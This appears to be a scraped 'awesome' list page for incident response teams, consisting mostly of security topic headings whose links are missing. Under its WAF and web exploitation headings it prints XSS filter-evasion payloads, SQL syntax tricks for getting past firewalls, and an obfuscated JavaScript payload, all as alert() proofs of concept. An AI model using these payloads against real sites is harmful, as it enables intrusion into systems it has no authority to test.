Home

Awesome

CSIRT Awesome

*Please contribute through pull requests- ;)

Another great list: awesome-incident-response

Books

Links

Incident Response

Hashing

CVEs

Malware Analysis

Web Malwares

Malware Samples

Repos

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles and Sources

Reverse Engineering

Decompilers

Yara

Ghidra

Frameworks

Patching

Hardening

WebServers

Credentials

Tokens

Secure Programming

Web Training

SAST

Secure Web dev

Formal Analysis

Fuzzing

API

REST

CTFs

CTFs tools

Phreak

Archs

Hardware

ARM

Pentesting

Reconnaissance

Enumeration

WebShells

ShellCodes

Reporting

OSINT - Open Source INTelligence

OSINT Webscraping

OSINT Chats

Vulnerability

WAFs

    '';!--"<XSS>=&{()}
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<svg
onload=alert%26%230000000040
"1")>

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNcliCk=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Exploits

Payloads

Bug Bounty

  curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Web Exploitation

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
Burp Suite

Red Team

Command & Control (C2)

Purple Team

DNS

Exfiltration

Steganography

Phishing

Forensics

PDF

Email Headers

Distros

Volatility

Blue Team

Threat Hunting

MISP

APT - Advanced Persistent Threat

IoCs

SIEM

Browsers

Browsers Addons

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

Powershell

Office and O/365

macOS/iOS

Mobile

Android

Linux/ *Nix

Cloud

GCP/Google

Azure

AWS

Risk Assessment and Vulnerability Management

Guidelines

ICS (SCADA)

Radio

Satellite

Social Engineering

Tools

Note-taking

Kali

IP Reputation

Shell tools

Search Engines

VPN

Secure Sharing

Privacy

General

Configs


Resources

Training and Certifications

Conferences and Slides

Sans

psyops


Sources

Some good places to visit:


Fun


Articles


Other Repos